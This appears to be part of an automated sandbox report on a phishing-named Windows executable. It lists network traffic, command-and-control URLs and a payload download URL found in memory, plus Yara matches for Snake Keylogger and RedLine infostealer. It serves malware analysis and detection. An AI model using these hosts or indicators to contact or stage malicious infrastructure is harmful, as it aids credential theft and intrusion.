                  Source: global trafficDNS traffic detected: DNS query: lpuegx.biz
                  Source: global trafficDNS traffic detected: DNS query: vjaxhpbji.biz
                  Source: unknownHTTP traffic detected: POST /nimjw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                  Source: alg.exe, 0000000C.00000003.1784206549.0000000000589000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1800721272.000000000058A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.143:80/bjede
                  Source: alg.exe, 0000000C.00000003.2281172548.000000000058A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.2052928274.000000000058A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1826309227.000000000058A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1800721272.000000000058A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.143:80/fauopp
                  Source: alg.exe, 0000000C.00000003.1825992446.00000000005AB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1826309227.00000000005A0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1830975438.00000000005A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/jedofahyn
                  Source: alg.exe, 0000000C.00000003.1825992446.00000000005AB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1830975438.00000000005A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/jedofahynK
                  Source: alg.exe, 0000000C.00000003.1700499143.000000000058A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1668813012.000000000058A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1685939273.000000000058A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107:80/fupmvmgjbhmts
                  Source: alg.exe, 0000000C.00000003.2281172548.000000000058A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.2052928274.000000000058A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1826309227.000000000058A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107:80/jedofahynusid=18&utid=28672494417
                  Source: alg.exe, 0000000C.00000003.1700499143.000000000058A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1784206549.0000000000589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105:80/cbecuogqej
                  Source: alg.exe, 0000000C.00000003.1644704325.000000000056F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/
                  Source: alg.exe, 0000000C.00000003.1644704325.000000000056F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1644501807.000000000058C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/kka
                  Source: alg.exe, 0000000C.00000003.1685939273.000000000058A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/npdqgsoqmqY
                  Source: alg.exe, 0000000C.00000003.1700499143.000000000058A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1685939273.000000000058A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177:80/npdqgsoqmq
                  Source: alg.exe, 0000000C.00000002.2678337066.000000000056F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/
                  Source: alg.exe, 0000000C.00000002.2678337066.000000000056F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000002.2678337066.00000000005A0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000002.2678337066.00000000005B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/eooel
                  Source: alg.exe, 0000000C.00000002.2678337066.00000000005B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/eooelngs
                  Source: alg.exe, 0000000C.00000003.2503862949.00000000005B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/ewvwgr
                  Source: alg.exe, 0000000C.00000003.2503862949.00000000005B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/ewvwgrngs
                  Source: alg.exe, 0000000C.00000003.2503862949.00000000005B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/ewvwgroU
                  Source: alg.exe, 0000000C.00000003.2279374376.00000000005AB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.2281172548.000000000058A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.2280831077.00000000005B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/pfoxkxwneqnmhcsc
                  Source: alg.exe, 0000000C.00000003.2053936887.00000000005B4000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000002.2678337066.0000000000518000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/tjgeolaydho
                  Source: alg.exe, 0000000C.00000003.2053936887.00000000005B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/tjgeolaydhoK
                  Source: alg.exe, 0000000C.00000002.2678337066.000000000058A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197:80/eooelpp
                  Source: alg.exe, 0000000C.00000002.2678337066.000000000058A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.2504408832.000000000058A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197:80/ewvwgrydho;
                  Source: alg.exe, 0000000C.00000003.2281172548.000000000058A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197:80/pfoxkxwneqnmhcscM
                  Source: alg.exe, 0000000C.00000003.2281172548.000000000058A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.2052928274.000000000058A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197:80/tjgeolaydho;
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E230000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E2B7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1639818443.000000007EAA7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539867731.000000007FCC0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E230000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E2B7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1639818443.000000007EAA7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539867731.000000007FCC0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E230000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E2B7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1639818443.000000007EAA7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539867731.000000007FCC0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E230000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E2B7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1639818443.000000007EAA7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539867731.000000007FCC0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E230000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E2B7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1639818443.000000007EAA7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539867731.000000007FCC0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E230000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E2B7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1639818443.000000007EAA7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539867731.000000007FCC0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E230000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E2B7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1639818443.000000007EAA7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539867731.000000007FCC0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E230000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E2B7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1639818443.000000007EAA7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539867731.000000007FCC0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E230000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E2B7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1639818443.000000007EAA7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539867731.000000007FCC0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E230000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E2B7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1639818443.000000007EAA7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539867731.000000007FCC0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E230000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E2B7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1639818443.000000007EAA7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539867731.000000007FCC0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E230000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E2B7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1639818443.000000007EAA7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539867731.000000007FCC0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E230000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E2B7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1639818443.000000007EAA7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539867731.000000007FCC0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E230000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E2B7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1639818443.000000007EAA7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539867731.000000007FCC0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E230000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E2B7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1639818443.000000007EAA7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539867731.000000007FCC0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E230000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E2B7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1639818443.000000007EAA7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539867731.000000007FCC0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E230000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E2B7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1639818443.000000007EAA7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539867731.000000007FCC0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0C
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exeString found in binary or memory: http://rbg.n
                  Source: alg.exe, 0000000C.00000002.2678337066.0000000000518000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww12.przvgke.biz/
                  Source: alg.exe, 0000000C.00000003.1801065112.0000000001760000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww12.przvgke.biz/?ts=fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwMTd8fHx8fHw2NzU3ZGE0M2E5
                  Source: alg.exe, 0000000C.00000003.1785018186.0000000001700000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww12.przvgke.biz/?ts=fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwMTd8fHx8fHw2NzU3ZGE0MWNm
                  Source: alg.exe, 0000000C.00000003.1830975438.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.2052183315.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1784696793.00000000005BE000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1800587225.00000000005BE000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1825992446.00000000005BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww12.przvgke.biz/bjede?usid=18&utid=28672493896
                  Source: alg.exe, 0000000C.00000002.2678337066.0000000000518000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1800587225.00000000005BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww12.przvgke.biz/fauopp?usid=18&utid=28672494417
                  Source: alg.exe, 0000000C.00000003.1784206549.0000000000589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww12.przvgke.biz:80/bjede?usid=18&utid=28672493896
                  Source: alg.exe, 0000000C.00000003.1800721272.000000000058A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww12.przvgke.biz:80/fauopp?usid=18&utid=28672494417
                  Source: alg.exe, 0000000C.00000003.2279374376.00000000005AB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1825992446.00000000005AB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000002.2678337066.000000000056F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1800587225.00000000005AB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.2503862949.00000000005AB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.2281474066.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000002.2678337066.00000000005AB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1804005716.00000000005A8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1783776008.00000000005AB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1830975438.00000000005A8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.2504629883.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.2052183315.00000000005AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww99.przvgke.biz/bjede
                  Source: alg.exe, 0000000C.00000002.2678337066.000000000056F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww99.przvgke.biz/bjedeT
                  Source: alg.exe, 0000000C.00000003.1800587225.00000000005AB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.2503862949.00000000005AB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.2281474066.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000002.2678337066.00000000005AB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1804005716.00000000005A8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1800849962.00000000005B3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1830975438.00000000005A8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.2504629883.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.2052183315.00000000005AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww99.przvgke.biz/fauopp
                  Source: alg.exe, 0000000C.00000003.1784206549.0000000000589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww99.przvgke.biz:80/bjede
                  Source: alg.exe, 0000000C.00000003.1826309227.000000000058A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1800721272.000000000058A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww99.przvgke.biz:80/fauopp
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1430067996.000000007F9E0000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1571228970.0000000021D3D000.00000004.00000020.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1619277496.00000000209C2000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1429814207.0000000002597000.00000004.00000020.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1585083858.0000000002596000.00000004.00000020.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1642838997.000000007FB6F000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1634935767.0000000022065000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1571228970.0000000021CDF000.00000004.00000020.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1619277496.00000000209E5000.00000004.00001000.00020000.00000000.sdmp, ymafvvdS.pif, 00000009.00000000.1571834546.0000000000416000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.pmail.com
                  Source: SingleClientServicesUpdater.exe.9.drString found in binary or memory: http://www.winimage.com/zLibDll
                  Source: ymafvvdS.pif, 00000009.00000003.2094996714.000000002A440000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxFailed
                  Source: ymafvvdS.pif, 00000009.00000003.2095974007.000000002A440000.00000004.00001000.00020000.00000000.sdmp, ymafvvdS.pif, 00000009.00000003.2096253940.000000002A440000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxHKEY_LOCAL_MACHINE
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1577410534.00000000007A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lwaziacademy.com/
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1619277496.0000000020A7D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://lwaziacademy.com/royal/2
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1619277496.0000000020A7D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://lwaziacademy.com/royal/233_Sdvvfamydeo
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1577410534.00000000007A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lwaziacademy.com/royal/233_SdvvfamydeoM6
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1577410534.00000000007CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lwaziacademy.com/royal/233_Sdvvfamydeo~
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1577410534.00000000007F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lwaziacademy.com:443/royal/233_Sdvvfamydeo
                  Source: alg.exe, 0000000C.00000003.1801065112.0000000001760000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1800351712.00000000014A0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1783458530.00000000014A0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1785018186.0000000001700000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://parking3.parklogic.com/page/enhance.js?pcId=12&domain=przvgke.biz
                  Source: alg.exe, 0000000C.00000003.1801065112.0000000001760000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000C.00000003.1785018186.0000000001700000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pcnatrk.net/track.
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E230000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E2B7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1639818443.000000007EAA7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539867731.000000007FCC0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                  Source: ymafvvdS.pif, 00000009.00000003.1780195449.000000002AE10000.00000004.00000020.00020000.00000000.sdmp, ymafvvdS.pif, 00000009.00000003.1780016826.000000002A730000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                  Source: unknownHTTPS traffic detected: 41.185.8.252:443 -> 192.168.2.9:49707 version: TLS 1.2
                  Source: Yara matchFile source: Process Memory Space: PURCHASE REQUIRED DETAILS 000487958790903403.exe PID: 7608, type: MEMORYSTR

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 9.3.ymafvvdS.pif.24742da8.17.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 9.3.ymafvvdS.pif.24590000.925.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 9.1.ymafvvdS.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 9.3.ymafvvdS.pif.24742da8.17.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 9.1.ymafvvdS.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 00000009.00000001.1572297626.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 00000009.00000003.1577655247.0000000024742000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: ymafvvdS.pif PID: 7996, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Initial sample is a PE file and has a suspicious name
                  Source: initial sampleStatic PE information: Filename: PURCHASE REQUIRED DETAILS 000487958790903403.exe
